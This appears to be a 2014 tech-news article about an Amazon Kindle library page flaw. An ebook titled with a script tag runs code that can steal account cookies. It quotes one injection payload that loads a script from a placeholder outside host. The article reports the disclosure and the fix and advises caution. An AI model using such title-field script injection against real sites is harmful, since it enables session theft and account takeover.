• Cryptocurrency
  • Earnings
  • Enterprise
  • About TechBooky
  • Submit Article
  • Advertise Here
  • Contact Us
TechBooky
  • African
  • AI
  • Metaverse
  • Gadgets
Generic selectors
Exact matches only
Search in title
Search in content
Post Type Selectors
  • African
  • AI
  • Metaverse
  • Gadgets
Generic selectors
Exact matches only
Search in title
Search in content
Post Type Selectors
TechBooky
Generic selectors
Exact matches only
Search in title
Search in content
Post Type Selectors
Home Internet

Beware! Hackers can exploit security flaw in kindle using malicious books

Martin Odinuwe by Martin Odinuwe
September 16, 2014
in Internet, Security
Share on FacebookShare on Twitter

Amazon might not have a security issue at Audible but they do have one on their main website.

A security researcher has reported, and I can confirm, that Amazon has a security hole on the “manage Your Kindle” page – one which is relatively easy to fix.

Thanks to this hole, a hacker can gain access to the Amazon account simply by getting his victims to download an ebook which was itself hacked to include a script in the title:

Once an attacker manages to have an e-book (file, document, …) with a title like

<script src=”https://www.example.org/script.js”></script>

added to the victim’s library, the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised.

kindle issues

I’ve tried it, and it does work. I saw something similar to the image which the hacker posted to his blog.

As a result I would urge caution against buying or downloading ebooks from untrustworthy sources –  for the near future, at least. I expect Amazon will fix this problem shortly – that’s what they did when it was first discovered last fall.

No this is not a new story, though it is just coming to light. The German ebook blog AlleseBook.de broke the story earlier today when they reported on the hacker who discovered this issue – and more importantly, provided an ebook which could prove the hack worked.

Benjamin Daniel Mussler writes that he discovered this security issue last October. He notified Amazon in November, and they fixed it 4 days later. That is great, but then then Amazon reintroduced the security hole earlier this year when they launched the new version of the “Manage Your Kindle” page.

As of the time I wrote this post, Mussler’s hack still worked.  There’s even an ebook which you can use to test the hack yourself, if you like. I would recommend against it, but it is up to you.

On a related note, if you’re worried about being hacked, there is a simple rule you can follow to keep yourself safe.

I have a rule against downloading apps from questionable websites, one which I have long since applied to Epub ebooks (because they can contain Javascript)  and PDFs (because they can hold entire apps). Now it would seem that rule needs to be expanded to include Kindle ebooks as well.

source: Digital Reader

Related Posts:

  • hero-image
    Amazon Moves To Thwart BookTok, As It Tightens Its…
  • Amazon Is Pulling Out Its Kindle Business In China
  • shutterstock_chatgpt
    Researchers Warn ChatGPT Crawler May Cause DDoS…
  • Microsoft Teams
    Microsoft Teams Vulnerability Exposes User Systems
  • 020tYFWBL4Yz8jIIFUdKDR1-22
    A Fix to Microsoft Windows Defender And Security Flaws
  • Top_Cybersecurity_Projects
    Cybersecurity Projects for Both beginners and Experts
  • A computer popup box screen warning of a system being hacked, compromised software environment. 3D illustration.
    Biggest Data Breaches Caused By Security Misconfigurations
  • 1650037494_Download-Google-Chrome-Free-PC-Mac
    Google Chrome Has Security Updates Users Need To…

Discover more from TechBooky

Subscribe to get the latest posts sent to your email.

Martin Odinuwe

Martin Odinuwe

I am Martin Odinuwe, a logo identity designer, Graphic designer, Video editor and a professional videographer based in Abuja, Nigeria with over five years experience. I am currently a consultant with Reachout Multiservice company ltd a multimedia company in Abuja

BROWSE BY CATEGORIES

Select Category

    Receive top tech news directly in your inbox

    subscription from
    Loading

    Freshly Squeezed

    • Meta AI Reaches 1 Billion Monthly Users May 31, 2025
    • XChat, X’s New DM Feature, Available in Beta Testing May 31, 2025
    • Gmail Adds Gemini AI Summary Cards in May Update May 31, 2025
    • Nigeria Shines at Huawei ICT Competition May 31, 2025
    • 22 Nigerian Banks Join PAPSS Cross-Border Payment System May 31, 2025
    • Nintendo’s Hardware Finally Matches Switch Ambitions May 31, 2025

    Browse Archives

    June 2025
    MTWTFSS
     1
    2345678
    9101112131415
    16171819202122
    23242526272829
    30 
    « May    

    Quick Links

    • About TechBooky
    • Advertise Here
    • Contact us
    • Submit Article
    • Privacy Policy
    • Login

    © 2021 Design By Tech Booky Elite

    Generic selectors
    Exact matches only
    Search in title
    Search in content
    Post Type Selectors
    • African
    • Artificial Intelligence
    • Gadgets
    • Metaverse
    • Tips
    • About TechBooky
    • Advertise Here
    • Submit Article
    • Contact us

    © 2021 Design By Tech Booky Elite

    Discover more from TechBooky

    Subscribe now to keep reading and get access to the full archive.

    Continue reading

    We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.Ok